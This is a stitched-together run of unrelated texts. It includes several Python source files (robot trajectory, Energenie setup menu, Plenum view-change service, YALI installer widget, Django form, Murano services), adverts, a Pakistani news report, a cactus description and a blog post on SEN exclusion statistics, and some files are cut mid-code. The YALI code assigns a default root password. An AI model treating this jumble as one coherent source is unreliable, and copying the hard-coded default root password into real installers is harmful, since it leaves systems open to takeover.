dw = [args.delta_dof, min(args.delta_dof, 3)]
else:
print('Could not generate {} trajectory geometry.\n'.format(args.type))
sys.exit(1)
# trajectory generation
for i,d in enumerate(dof):
w_max = WPS[0, d] + dw[i]
w_min = WPS[0, d] + np.ceil(dw[i] / N)
WPS[1::2, d] = np.linspace(w_max, w_min, num=C)
WPS[2::2, d] = WPS[0, d] * np.ones((C,))
# compensate for initial yaw
ROT = np.eye(6) # rotation matrix
r = 0 # roll
p = 0 # pitch
y = WPS[0,5] # yaw
# set the rotation using current attitude
ROT[0:2, 0:2] = [
[cos(p)*cos(y), cos(r)*sin(y)+sin(r)*sin(p)*cos(y)],
[-cos(p)*sin(y), cos(r)*cos(y)-sin(r)*sin(p)*sin(y)]
]
# apply rotation
WPR = np.dot(WPS, ROT)
# trajectory export
spec = {
'type': args.type,
'delta': dw,
'dof': dof
}
if args.verbose:
print(WPS)
print(' ')
print(WPR)
print(' ')
tt.plot_trajectory(WPR, arrow_length=0.2)
# print final trajectory
try:
import yaml
print(yaml.dump(tt.traj_as_dict(WPR, **spec)))
except ImportError:
import json
print(json.dumps(tt.traj_as_dict(WPR, **spec)))
if __name__ == '__main__':
main()
|
wimplo.com domain name for all communication with potential and active clients.
official company domain @wimplo.com email addresses.
address with a different domain name is likely an impostor.
With your banners on top crypto-related websites, you will get all the relevant traffic and brand awareness.
|
# setup_tool.py 28/05/2016 D.J.Whale
#
# A simple menu-driven setup tool for the Energenie Python library.
#
# Just be a simple menu system.
# This then means you don't have to have all this in the demo apps
# and the demo apps can just refer to object variables names
# from an assumed auto_create registry, that is built using this setup tool.
import time
import energenie
##from energenie.lifecycle import *
#===== GLOBALS =====
quit = False
#===== INPUT METHODS ==========================================================
try:
readin = raw_input # Python 2
except NameError:
readin = input # Python 3
def get_house_code():
"""Get a house code or default to Energenie code"""
while True:
try:
hc = readin("House code (ENTER for default)? ")
if hc == "": return None
except KeyboardInterrupt:
return None # user abort
try:
house_code = int(hc, 16)
return house_code
except ValueError:
print("Must enter a number")
def get_device_index():
"""get switch index, default 1 (0,1,2,3,4)"""
while True:
try:
di = readin("Device index 1..4 (ENTER for all)? ")
except KeyboardInterrupt:
return None # user abort
if di == "": return 0 # ALL
try:
device_index = int(di)
return device_index
except ValueError:
print("Must enter a number")
def show_registry():
"""Show the registry as a numbered list"""
i=1
names = []
for name in energenie.registry.names():
print("%d. %s %s" % (i, name, energenie.registry.get(name)))
names.append(name)
i += 1
return names
def get_device_name():
"""Give user a list of devices and choose one from the list"""
names = show_registry()
try:
while True:
i = readin("Which device %s to %s? " % (1, len(names)))
try:
device_index = int(i)
if device_index < 1 or device_index > len(names):
print("Choose a number between %s and %s" % (1, len(names)))
else:
break # got it
except ValueError:
print("Must enter a number")
except KeyboardInterrupt:
return None # nothing chosen, user aborted
name = names[device_index-1]
print("selected: %s" % name)
return name
#===== ACTION ROUTINES ========================================================
def do_legacy_learn():
"""Repeatedly broadcast a legacy switch message, so you can learn a socket to the pattern"""
# get device
house_code = get_house_code()
device_index = get_device_index()
# Use a MiHomeLight as it has the longest TX time
device = energenie.Devices.MIHO008((house_code, device_index))
# in a loop until Ctrl-C
print("Legacy learn broadcasting, Ctrl-C to stop")
try:
while True:
print("ON")
device.turn_on()
time.sleep(0.5)
print("OFF")
device.turn_off()
time.sleep(0.5)
except KeyboardInterrupt:
pass # user exit
def do_mihome_discovery():
"""Discover any mihome device when it sends reports"""
print("Discovery mode, press Ctrl-C to stop")
energenie.discovery_ask(energenie.ask)
try:
while True:
energenie.loop() # Allow receive processing
time.sleep(0.25) # tick fast enough to get messages in quite quickly
except KeyboardInterrupt:
print("Discovery stopped")
def do_list_registry():
"""List the entries in the registry"""
print("REGISTRY:")
show_registry()
energenie.registry.fsk_router.list()
def do_switch_device():
"""Turn the switch on a socket on and off, to test it"""
global quit
name = get_device_name()
device = energenie.registry.get(name)
def on():
print("Turning on")
device.turn_on()
def off():
print("Turning off")
device.turn_off()
MENU = [
("on", on),
("off", off)
]
try:
while not quit:
show_menu(MENU)
choice = get_choice((1,len(MENU)))
if choice != None:
handle_choice(MENU, choice)
except KeyboardInterrupt:
pass # user exit
quit = False
def do_show_device_status():
"""Show the readings associated with a device"""
name = get_device_name()
device = energenie.registry.get(name)
readings = device.get_readings_summary()
print(readings)
def do_watch_devices():
"""Repeatedly show readings for all devices"""
print("Watching devices, Ctrl-C to stop")
try:
while True:
energenie.loop() # allow receive processing
print('-' * 80)
names = energenie.registry.names()
for name in names:
device = energenie.registry.get(name)
readings = device.get_readings_summary()
print("%s %s" % (name, readings))
print("")
time.sleep(1)
except KeyboardInterrupt:
pass # user exit
def do_rename_device():
"""Rename a device in the registry to a different name"""
# This is useful when turning auto discovered names into your own names
old_name = get_device_name()
if old_name == None: return # user abort
try:
new_name = readin("New name? ")
except KeyboardInterrupt:
return # user abort
energenie.registry.rename(old_name, new_name)
print("Renamed OK")
def do_delete_device():
"""Delete a device from the registry so it is no longer recognised"""
name = get_device_name()
if name == None: return #user abort
energenie.registry.delete(name)
print("Deleted OK")
def do_logging():
"""Enter a mode where all communications are logged to screen and a file"""
import Logger
# provide a default incoming message handler for all fsk messages
def incoming(address, message):
print("\nIncoming from %s" % str(address))
print(message)
Logger.logMessage(message)
energenie.fsk_router.when_incoming(incoming)
print("Logging enabled, Ctrl-C to stop")
try:
while True:
energenie.loop()
except KeyboardInterrupt:
pass #user quit
finally:
energenie.fsk_router.when_incoming(None)
def do_quit():
"""Finished with the program, so exit"""
global quit
quit = True
#===== MENU ===================================================================
def show_menu(menu):
"""Display a menu on the console"""
i = 1
for item in menu:
print("%d. %s" % (i, item[0]))
i += 1
def get_choice(choices):
"""Get and validate a numberic choice from the tuple choices(first, last)"""
first = choices[0]
last = choices[1]
try:
while True:
choice = readin("Choose %d to %d? " % (first, last))
try:
choice = int(choice)
if choice < first or choice > last:
print("Must enter a number between %d and %d" % (first, last))
else:
return choice
except ValueError:
print("Must enter a number")
except KeyboardInterrupt:
do_quit()
def handle_choice(menu, choice):
"""Route to the handler for the given menu choice"""
menu[choice-1][1]()
MAIN_MENU = [
("legacy learn mode", do_legacy_learn),
("mihome discovery mode", do_mihome_discovery),
("list registry", do_list_registry),
("switch device", do_switch_device),
("show device status", do_show_device_status),
("watch devices", do_watch_devices),
("rename device", do_rename_device),
("delete device", do_delete_device),
("logging", do_logging),
("quit", do_quit)
]
#===== MAIN PROGRAM ===========================================================
def setup_tool():
"""The main program loop"""
while not quit:
print("\nMAIN MENU")
show_menu(MAIN_MENU)
choice = get_choice((1,len(MAIN_MENU)))
if not quit:
print("\n")
handle_choice(MAIN_MENU, choice)
if __name__ == "__main__":
energenie.init()
try:
setup_tool()
finally:
energenie.finished()
# END
|
BADIN: Pakistan People’s Party (PPP) leaders have warned the federal and Punjab governments to mend their ways and provide Sindh with its due share of water resources.
PPP leaders Gul Mohammad Jakhrani, Syed Ali Bux aka Pappu Shah, Bibi Yasmin Shah, member of National Assembly (MNA) Sardar Kamal Khan, member of provincial assembly (MPA) Mir Allah Bux Talpur, Haji Sain Bux Jamali, Haji Ramazan Chandio and others addressed a large public gathering at Mir Ghulam Mohammad Higher Secondary School’s ground in Tando Bago town on Sunday.
They alleged that the federal government in connivance with Punjab was involved in stealing the water share of Sindh as people in the province were facing the worst water crises. They said that both the prime minister and Punjab chief minister were responsible for the water crises and other issues in the province.
The PPP leaders said that they would block the roads leading to Punjab at Hatri Bypass in Hyderabad on May 16 and then they would proceed to Islamabad to stage a demonstration outside the parliament house and the Supreme Court of Pakistan to register their protest against the federal government.
The further said that they were untied and would inflict a heavy defeat on the estranged PPP leader Dr Zulfikar Ali Mirza and other opponents in Badin and other parts of the province. They asked Dr Mirza to stop using foul and filthy language against party leaders.
They assured the participants of the public gathering that nobody would be allowed to steal the water share of the province, while adding that they were trying to provide water to all areas of the province.
|
from typing import Callable
from plenum.common.config_util import getConfig
from plenum.common.constants import NODE_STATUS_DB_LABEL, VIEW_CHANGE_PREFIX
from plenum.common.event_bus import InternalBus, ExternalBus
from plenum.common.messages.internal_messages import VoteForViewChange, NodeNeedViewChange, NewViewAccepted
from plenum.common.messages.node_messages import InstanceChange
from plenum.common.metrics_collector import MetricsCollector, NullMetricsCollector
from plenum.common.router import Subscription
from plenum.common.stashing_router import StashingRouter, DISCARD
from plenum.common.timer import TimerService
from plenum.server.consensus.consensus_shared_data import ConsensusSharedData
from plenum.server.consensus.utils import replica_name_to_node_name
from plenum.server.database_manager import DatabaseManager
from plenum.server.replica_validator_enums import STASH_CATCH_UP, CATCHING_UP
from plenum.server.suspicion_codes import Suspicions, Suspicion
from plenum.server.view_change.instance_change_provider import InstanceChangeProvider
from stp_core.common.log import getlogger
logger = getlogger()
class ViewChangeTriggerService:
def __init__(self,
data: ConsensusSharedData,
timer: TimerService,
bus: InternalBus,
network: ExternalBus,
db_manager: DatabaseManager,
stasher: StashingRouter,
is_master_degraded: Callable[[], bool],
metrics: MetricsCollector = NullMetricsCollector()):
self._data = data
self._timer = timer
self._bus = bus
self._network = network
self._stasher = stasher
self._is_master_degraded = is_master_degraded
self.metrics = metrics
self._config = getConfig()
self._instance_changes = \
InstanceChangeProvider(outdated_ic_interval=self._config.OUTDATED_INSTANCE_CHANGES_CHECK_INTERVAL,
node_status_db=db_manager.get_store(NODE_STATUS_DB_LABEL),
time_provider=timer.get_current_time)
self._subscription = Subscription()
self._subscription.subscribe(bus, VoteForViewChange, self.process_vote_for_view_change)
self._subscription.subscribe(bus, NewViewAccepted, self.process_new_view_accepted)
self._subscription.subscribe(stasher, InstanceChange, self.process_instance_change)
def cleanup(self):
self._subscription.unsubscribe_all()
@property
def name(self):
return replica_name_to_node_name(self._data.name)
def __repr__(self):
return self.name
def process_vote_for_view_change(self, msg: VoteForViewChange):
proposed_view_no = self._data.view_no
# TODO: Some time ago it was proposed that view_no should not be increased during proposal
# if view change is already in progress, unless suspicion code is "view change is taking too long".
# Idea was to improve stability of view change triggering, however for some reason this change lead
# to lots of failing/flaky tests. This still needs to be investigated.
# if suspicion == Suspicions.INSTANCE_CHANGE_TIMEOUT or not self.view_change_in_progress:
if msg.suspicion != Suspicions.STATE_SIGS_ARE_NOT_UPDATED or not self._data.waiting_for_new_view:
proposed_view_no += 1
if msg.view_no is not None:
proposed_view_no = msg.view_no
self._send_instance_change(proposed_view_no, msg.suspicion)
def process_instance_change(self, msg: InstanceChange, frm: str):
frm = replica_name_to_node_name(frm)
# TODO: Do we really need this?
if frm not in self._network.connecteds:
return DISCARD, "instance change request: {} from {} which is not in connected list: {}".\
format(msg, frm, self._network.connecteds)
if not self._data.is_participating:
return STASH_CATCH_UP, CATCHING_UP
logger.info("{} received instance change request: {} from {}".format(self, msg, frm))
if msg.viewNo <= self._data.view_no:
return DISCARD, "instance change request with view no {} which is not more than its view no {}".\
format(msg.viewNo, self._data.view_no)
# Record instance changes for views but send instance change
# only when found master to be degraded. if quorum of view changes
# found then change view even if master not degraded
self._on_verified_instance_change_msg(msg, frm)
if self._instance_changes.has_inst_chng_from(msg.viewNo, self.name):
logger.info("{} received instance change message {} "
"but has already sent an instance change message".format(self, msg))
elif not self._is_master_degraded():
logger.info("{} received instance change message {} "
"but did not find the master to be slow".format(self, msg))
else:
logger.display("{}{} found master degraded after "
"receiving instance change message from {}".format(VIEW_CHANGE_PREFIX, self, frm))
self._send_instance_change(msg.viewNo, Suspicions.PRIMARY_DEGRADED)
def process_new_view_accepted(self, msg: NewViewAccepted):
self._instance_changes.remove_view(self._data.view_no)
def _send_instance_change(self, view_no: int, suspicion: Suspicion):
logger.info("{}{} sending an instance change with view_no {} since {}".
format(VIEW_CHANGE_PREFIX, self, view_no, suspicion.reason))
msg = InstanceChange(view_no, suspicion.code)
self._network.send(msg)
# record instance change vote for self and try to change the view if quorum is reached
self._on_verified_instance_change_msg(msg, self.name)
def _on_verified_instance_change_msg(self, msg: InstanceChange, frm: str):
view_no = msg.viewNo
if not self._instance_changes.has_inst_chng_from(view_no, frm):
self._instance_changes.add_vote(msg, frm)
if view_no > self._data.view_no:
self._try_start_view_change_by_instance_change(view_no)
def _try_start_view_change_by_instance_change(self, proposed_view_no: int) -> bool:
# TODO: Need to handle skewed distributions which can arise due to
# malicious nodes sending messages early on
can, why_not = self._can_view_change(proposed_view_no)
if can:
logger.display("{}{} initiating a view change to {} from {}".
format(VIEW_CHANGE_PREFIX, self, proposed_view_no, self._data.view_no))
self._bus.send(NodeNeedViewChange(view_no=proposed_view_no))
else:
logger.info(why_not)
return can
def _can_view_change(self, proposed_view_no: int) -> (bool, str):
quorum = self._data.quorums.view_change.value
if not self._instance_changes.has_quorum(proposed_view_no, quorum):
return False, '{} has no quorum for view {}'.format(self, proposed_view_no)
if not proposed_view_no > self._data.view_no:
return False, '{} is in higher view more than {}'.format(self, proposed_view_no)
return True, ''
|
Spring season brings beautiful flowers and growth with it, but unfortunately it also bring the warm and wet environment which kick pests into their hyperactive and breeding modes. Getting ready for spring and summer is easy with an early spring pest treatment designed to stop pests before they begin breeding and entering your home, preventing infestations and expensive exterminations later in the year.
In Las Vegas, Nevada, pests can ruin our homes and pose a health threat. That’s why at Ace Pest Control, we seek to offer year round pest control through our spring pest treatments. We use our best pest identification and protection programs to insure that your home’s structure is up to the task of keeping bugs out during the spring, and when it becomes cold and bugs look for warmth in the winter as well.
During spring season many insects will begin looking for a place to nest as well as for a food source, our pest control treatments during this season are focused on perimeter treatment to prevent against ants, wasps, hornets, spiders, centipedes, crickets, flies, earwigs, beetles, and many other pests. However, we also offer a year round treatment program in which we can visit your home throughout the year and apply pest deterring solutions to the key pest entry points of your home.
At Ace Pest Control, our goal is always to stop pests and pest problems on the outside before they become inside pests and inside problems. This approach reduces the need for inside treatments as well as the incontinence and expenses associated with removing an infestation after it has begun in a home.
If you’re looking for a local pest control company in Las Vegas that offers affordable pest removal and preventative services, then give us a call today at (702) 871-1211. We specialize in removing and preventing bed bugs, cockroaches, spiders, ants, wasps, bees, yellow jackets, mice, and many other pests and rodents.
Through the years of experience that we have accumulated in pest control, we have also grown many references for both removal jobs and yearly pest control service contracts. Our dedication to perfection and preventive care has earned us the “pest control guys” title in the Las Vegas area, which we are extremely proud to have earned and continue to hold even today. At Ace Pest Control, we respect tour clients and their needs and because of it we take extra care in maximizing comfort and pest control effectiveness.
At Ace Pest Control, our staff’s focus is dedicated to making sure that you are 100% satisfied and safe. This means that your comfort and safety always takes precedence over anything else, and when you work with us it’s hard to miss how much we value our customers.
One of the most valuable services we provide for homeowners, which saves them hundreds of thousands of dollars in damages if unchecked, is our routine inspections during any service we offer. This insures that you never find yourself with a surprise infestation of anything ranging from ants to mice, not only ensuring your safety but also saving you time and money in the long run with expensive exterminations.
If you see something that isn’t right or makes you question if your home may have a pest problem, don’t hesitate to call us. We extend our full inspection for free to all homeowners that are worried about their home and family, regardless of any other service we offer. To make use of our free pest inspection and consultation, give us a call at (702) 871-1211.
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2010 TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import gettext
_ = gettext.translation('yali', fallback=True).ugettext
from PyQt4.Qt import QWidget, SIGNAL, QTimer, QDate, QComboBox, QTime
from pds.thread import PThread
from pds.gui import PMessageBox, MIDCENTER, CURRENT, OUT
import yali.localedata
import yali.context as ctx
import yali.postinstall
import yali.storage
from yali.gui import ScreenWidget
from yali.gui.Ui.datetimewidget import Ui_DateTimeWidget
from yali.timezone import TimeZoneList
class Widget(QWidget, ScreenWidget):
name = "timeSetup"
def __init__(self):
QWidget.__init__(self)
self.ui = Ui_DateTimeWidget()
self.ui.setupUi(self)
self.timer = QTimer(self)
self.from_time_updater = True
self.is_date_changed = False
self.current_zone = ""
self.tz_dict = {}
self.continents = []
self.countries = []
for country, data in yali.localedata.locales.items():
if country == ctx.consts.lang:
if data.has_key("timezone"):
ctx.installData.timezone = data["timezone"]
# Append continents and countries the time zone dictionary
self.createTZDictionary()
# Sort continent list
self.sortContinents()
# Append sorted continents to combobox
self.loadContinents()
# Load current continents country list
self.getCountries(self.current_zone["continent"])
# Highlight the current zone
self.index = self.ui.continentList.findText(self.current_zone["continent"])
self.ui.continentList.setCurrentIndex(self.index)
self.index = self.ui.countryList.findText(self.current_zone["country"])
self.ui.countryList.setCurrentIndex(self.index)
# Initialize widget signal and slots
self.__initSignals__()
self.ui.calendarWidget.setDate(QDate.currentDate())
self.pthread = None
self.pds_messagebox = PMessageBox(self)
self.pds_messagebox.enableOverlay()
self.timer.start(1000)
def __initSignals__(self):
self.connect(self.ui.timeEdit, SIGNAL("timeChanged(QTime)"), self.timerStop)
self.connect(self.ui.calendarWidget, SIGNAL("selectionChanged()"), self.dateChanged)
self.connect(self.timer, SIGNAL("timeout()"), self.updateClock)
self.connect(self.ui.continentList, SIGNAL("activated(QString)"), self.getCountries)
def createTZDictionary(self):
tz = TimeZoneList()
zones = [ x.timeZone for x in tz.getEntries() ]
zones.sort()
for zone in zones:
split = zone.split("/")
# Human readable continent names
continent_pretty_name = split[0].replace("_", " ")
continent_pretty_name = continent_pretty_name
# Some country names can be like Argentina/Catamarca so this fixes the splitting problem
# caused by zone.split("/")
#
# Remove continent info and take the rest as the country name
split.pop(0)
country_pretty_name = " / ".join(split)
# Human readable country names
country_pretty_name = country_pretty_name.replace("_", " ")
# Get current zone
if zone == ctx.installData.timezone:
self.current_zone = { "continent":continent_pretty_name, "country":country_pretty_name}
# Append to dictionary
if self.tz_dict.has_key(continent_pretty_name):
self.tz_dict[continent_pretty_name].append([country_pretty_name, zone])
else:
self.tz_dict[continent_pretty_name] = [[country_pretty_name, zone]]
def sortContinents(self):
for continent in self.tz_dict.keys():
self.continents.append(continent)
self.continents.sort()
def loadContinents(self):
for continent in self.continents:
self.ui.continentList.addItem(continent)
def getCountries(self, continent):
# Countries of the selected continent
countries = self.tz_dict[str(continent)]
self.ui.countryList.clear()
for country, zone in countries:
self.ui.countryList.addItem(country, zone)
self.countries.append(country)
def dateChanged(self):
self.is_date_changed = True
def timerStop(self):
if self.from_time_updater:
return
# Human action detected; stop the timer.
self.timer.stop()
def updateClock(self):
# What time is it ?
cur = QTime.currentTime()
self.from_time_updater = True
self.ui.timeEdit.setTime(cur)
self.from_time_updater = False
def shown(self):
self.timer.start(1000)
if ctx.flags.install_type == ctx.STEP_BASE:
self.pthread = PThread(self, self.startInit, self.dummy)
def dummy(self):
pass
def setTime(self):
ctx.interface.informationWindow.update(_("Adjusting time settings"))
date = self.ui.calendarWidget.date()
time = self.ui.timeEdit.time()
args = "%02d%02d%02d%02d%04d.%02d" % (date.month(), date.day(),
time.hour(), time.minute(),
date.year(), time.second())
# Set current date and time
ctx.logger.debug("Date/Time setting to %s" % args)
yali.util.run_batch("date", [args])
# Sync date time with hardware
ctx.logger.debug("YALI's time is syncing with the system.")
yali.util.run_batch("hwclock", ["--systohc"])
ctx.interface.informationWindow.hide()
def execute(self):
if not self.timer.isActive() or self.is_date_changed:
QTimer.singleShot(500, self.setTime)
self.timer.stop()
index = self.ui.countryList.currentIndex()
ctx.installData.timezone = self.ui.countryList.itemData(index).toString()
ctx.logger.debug("Time zone selected as %s " % ctx.installData.timezone)
if ctx.flags.install_type == ctx.STEP_BASE:
#FIXME:Refactor hacky code
ctx.installData.rootPassword = ctx.consts.default_password
ctx.installData.hostName = yali.util.product_release()
if ctx.storageInitialized:
disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
if len(disks) == 1:
ctx.storage.clearPartDisks = [disks[0].name]
ctx.mainScreen.step_increment = 2
else:
ctx.mainScreen.step_increment = 1
return True
else:
self.pds_messagebox.setMessage(_("Storage Devices initialising..."))
self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)
ctx.mainScreen.step_increment = 0
self.pthread.start()
QTimer.singleShot(2, self.startStorageInitialize)
return False
return True
def startInit(self):
self.pds_messagebox.animate(start=MIDCENTER, stop=MIDCENTER)
def startStorageInitialize(self):
ctx.storageInitialized = yali.storage.initialize(ctx.storage, ctx.interface)
self.initFinished()
def initFinished(self):
self.pds_messagebox.animate(start=CURRENT, stop=CURRENT, direction=OUT)
disks = filter(lambda d: not d.format.hidden, ctx.storage.disks)
if ctx.storageInitialized:
if len(disks) == 1:
ctx.storage.clearPartDisks = [disks[0].name]
ctx.mainScreen.step_increment = 2
else:
ctx.mainScreen.step_increment = 1
ctx.mainScreen.slotNext(dry_run=True)
else:
ctx.mainScreen.enableBack()
|
This cactus is very interesting for cultivation for several reasons. Firstly, this cactus grows in mountains and in winter it is covered by snopw during several months. Few cacti in the world can do that. For this same reason, it is very important to carry out cold stratification of the seeds. Secondly, this cactus is edible and has very big fruits, compared to its size. Thirdly, it grows fast and begins fruiting just in a few years. You should consider that most edible cacti may take up to 10 years before starting to produce fruits. This one is fast.
Maihuenia poeppigii (Otto ex Pfeiffer) Phil. ex K. Schum 植物更多的照片這里可以看.
|
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_unicode
from django.conf import settings
from ella.utils.timezone import now
from threadedcomments.forms import ThreadedCommentForm
class AuthorizedCommentForm(ThreadedCommentForm):
user = None
def __init__(self, *args, **kwargs):
"there is no such thing as user_name, user_email, user_url"
super(AuthorizedCommentForm, self).__init__(*args, **kwargs)
self.fields.pop('name')
self.fields.pop('email')
self.fields.pop('url')
def check_for_duplicate_comment(self, new):
"""
copy paste of check_for_duplicate_comment from ``django.contrib.comments.forms``
so we can let the decision of which db to use on router
"""
possible_duplicates = self.get_comment_model()._default_manager.filter(
content_type = new.content_type,
object_pk = new.object_pk,
user_name = new.user_name,
user_email = new.user_email,
user_url = new.user_url,
)
for old in possible_duplicates:
if old.submit_date.date() == new.submit_date.date() and old.comment == new.comment:
return old
return new
def get_comment_create_data(self):
"so remove it from comment create date"
return dict(
parent_id = self.cleaned_data['parent'],
title = self.cleaned_data['title'],
content_type = ContentType.objects.get_for_model(self.target_object),
object_pk = force_unicode(self.target_object._get_pk_val()),
user_name = self.user.get_full_name() or self.user.username,
user_email = self.user.email,
comment = self.cleaned_data["comment"],
submit_date = now(),
site_id = settings.SITE_ID,
is_public = True,
is_removed = False,
)
|
Statistics published by the Department for Education today show that pupils with statements are nine times more likes to be permanently excluded from school than those pupils without any SEN. Meanwhile, the number of pupils with statements of SEN receiving one or more fixed period exclusions is six times higher than for pupils with no SEN.
The Statistical First Release (SFR) provides information about exclusions from schools and exclusion appeals in England during 2010/11. It reports national trends in the number of permanent and fixed-period exclusions together with information on the characteristics of excluded pupils such as age, gender, ethnicity, free school meal eligibility, and special educational needs (SEN) as well as the reasons for exclusion.
There were 5080 permanent exclusions from state-funded primary, state-funded secondary and all special schools in 2010/11.
In 2010/11 there were 271,980 fixed-period exclusions from state-funded secondary schools, 37,790 fixed-period exclusions from state-funded primary schools and 14,340-fixed period exclusions from special schools.
The average length of a fixed-period exclusion in state-funded secondary schools was 2.4 days, for state-funded primary schools the average length of a fixed-period exclusion was 2.1 days.
The permanent exclusion rate for boys was approximately three times higher than that for girls. The fixed-period exclusion rate for boys was almost three times higher than that for girls.
Pupils with SEN with statements are around nine times more likely to be permanently excluded than those pupils with no SEN.
Children who are eligible for free school meals are nearly four times more likely to receive a permanent exclusion and around three times more likely to receive a fixed-period exclusion than children who are not eligible for free school meals.
What are we to make of these statistics? I'm certainly no analyst but the figures surely speak for themselves. Of course, we can't see what kind of SEN we're talking about but the reasons for exclusion included physical or verbal assault against a pupil or adult, bullying or racist abuse and persistent disruptive behaviour among other reasons, most of which contain criminal aspects. These things should not, quite rightly, be tolerated, but it's the reasons behind the category of persistent disruptive behaviour that interests me.
A mainstream school it would seem is, quite often, unable to cope with the high level of demands placed upon it by children with special educational needs and challenging behaviour and for these children, inclusion is the last thing they need. They need a specialised environment that can help them overcome difficulties of background or learning style or hidden disability so they have the same chance of a successful life as everyone else. Timely intervention is crucial for these children so that they can be identified and assisted long before things get to the stage of an exclusion being considered.
When thinking specifically of children with statements, I wonder what percentage of these SEN children, or of children with SEN but without statements, were excluded for persistent disruptive behaviour compared to the other reasons above. A child displaying persistent disruptive behaviour almost certainly has underlying issues, whether BESD, ADHD, ASD etc, that prevents them from accessing the curriculum and hence makes them feel that school is a waste of time.
A large percentage were also recipients of free school meals, which also indicates that poor children (with or without SEN) are hugely at risk of not getting the support they need in a mainstream school environment. Many may come from difficult family backgrounds and would be much more suited to a nurture group environment such as those set up by child psychologist Charlie Mead, if only they existed more widely.
There is much interesting analysis that can be taken from these stats aside from the startling SEN figures, for example the comparatively high ratio of exclusions for traveller children (who may or may not have SEN). These would take far more time to ponder than I have available, but I hope someone does and lets me know.
The Every Child in Need Campaign – help needed!
A possible explanation for a correlation between certain social groups and sen pupils being excluded is the ignorance of many teachers about the wider world. Caccooned in their bubble they perceive any socio-economic difference to their own social norms (eg: poor, traveller or single parent in a council house) as being the reason for a child’s disruptive behaviour and not the child’s sen. Yes, I speak from the bitter end of this experience and would like to see some research into the prevalance of school exclusions amongst pupils with sen and their socio-economic group. Instinct tells me that the exclusions of sen pupils amongst the socio-economic groups that most teachers self-identify with will have lower levels of exclusion than sen pupils from other differentiated socio-economic groups.
|
# Copyright (c) 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import types
from oslo_utils import timeutils
from webob import exc
from murano.common.i18n import _
from murano.common import utils
from murano.db.services import environment_templates as env_temp
from murano.db.services import environments as envs
from murano.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class CoreServices(object):
@staticmethod
def get_service_status(environment_id, service_id):
"""Service can have one of three distinguished statuses:
- Deploying: if environment has status deploying and there is at least
one orchestration engine report for this service;
- Pending: if environment has status `deploying` and there is no
report from orchestration engine about this service;
- Ready: If environment has status ready.
:param environment_id: Service environment, we always know to which
environment service belongs to
:param service_id: Id of service for which we checking status.
:return: Service status
"""
# Now we assume that service has same status as environment.
# TODO(ruhe): implement as designed and described above
return envs.EnvironmentServices.get_status(environment_id)
@staticmethod
def get_data(environment_id, path, session_id=None):
get_description = envs.EnvironmentServices.get_environment_description
env_description = get_description(environment_id, session_id)
if env_description is None:
return None
if 'services' not in env_description:
return []
result = utils.TraverseHelper.get(path, env_description)
if path == '/services':
get_status = CoreServices.get_service_status
for srv in result:
srv['?']['status'] = get_status(environment_id, srv['?']['id'])
return result
@staticmethod
def get_template_data(env_template_id, path):
"""It obtains the data for the template. It includes
all the services. In case the path includes information
such as the env_template_id, the information provided will
be related to the entity specified in the path
:param env_template_id: The env_template_id to obtain the data
:param path: Id of service for which we checking status.
:return: The template description
"""
temp_description = env_temp.EnvTemplateServices.\
get_description(env_template_id)
if temp_description is None:
return None
if 'services' not in temp_description:
return []
result = utils.TraverseHelper.get(path, temp_description)
if result is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
return result
@staticmethod
def post_env_template_data(env_template_id, data, path):
"""It stores the template data inside the template
description.
:param env_template_id: The env_template_id to obtain the data
:param data: the template description
:param path: Id of service for which we checking status.
:return: The template description
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
temp_description = get_description(env_template_id)
if temp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in temp_description:
temp_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, temp_description)
else:
utils.TraverseHelper.insert(path, data, temp_description)
save_description(temp_description)
return data
@staticmethod
def post_application_data(env_template_id, data, path):
"""It stores the application data inside the template
description.
:param env_template_id: The env_template_id to obtain the data
:param data: the template description
:param path: Id of service for which we checking status.
:return: The template description
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
temp_description = get_description(env_template_id)
if temp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in temp_description:
temp_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, temp_description)
else:
utils.TraverseHelper.insert(path, data, temp_description)
save_description(temp_description, env_template_id)
return data
@staticmethod
def post_data(environment_id, session_id, data, path):
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
if env_description is None:
msg = _('Environment <EnvId {0}> is not found').format(
environment_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
if 'services' not in env_description:
env_description['services'] = []
if path == '/services':
if isinstance(data, types.ListType):
utils.TraverseHelper.extend(path, data, env_description)
else:
utils.TraverseHelper.insert(path, data, env_description)
save_description(session_id, env_description)
return data
@staticmethod
def put_data(environment_id, session_id, data, path):
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
utils.TraverseHelper.update(path, data, env_description)
env_description['?']['updated'] = str(timeutils.utcnow())
save_description(session_id, env_description)
return data
@staticmethod
def delete_data(environment_id, session_id, path):
get_description = envs.EnvironmentServices.get_environment_description
save_description = envs.EnvironmentServices.\
save_environment_description
env_description = get_description(environment_id, session_id)
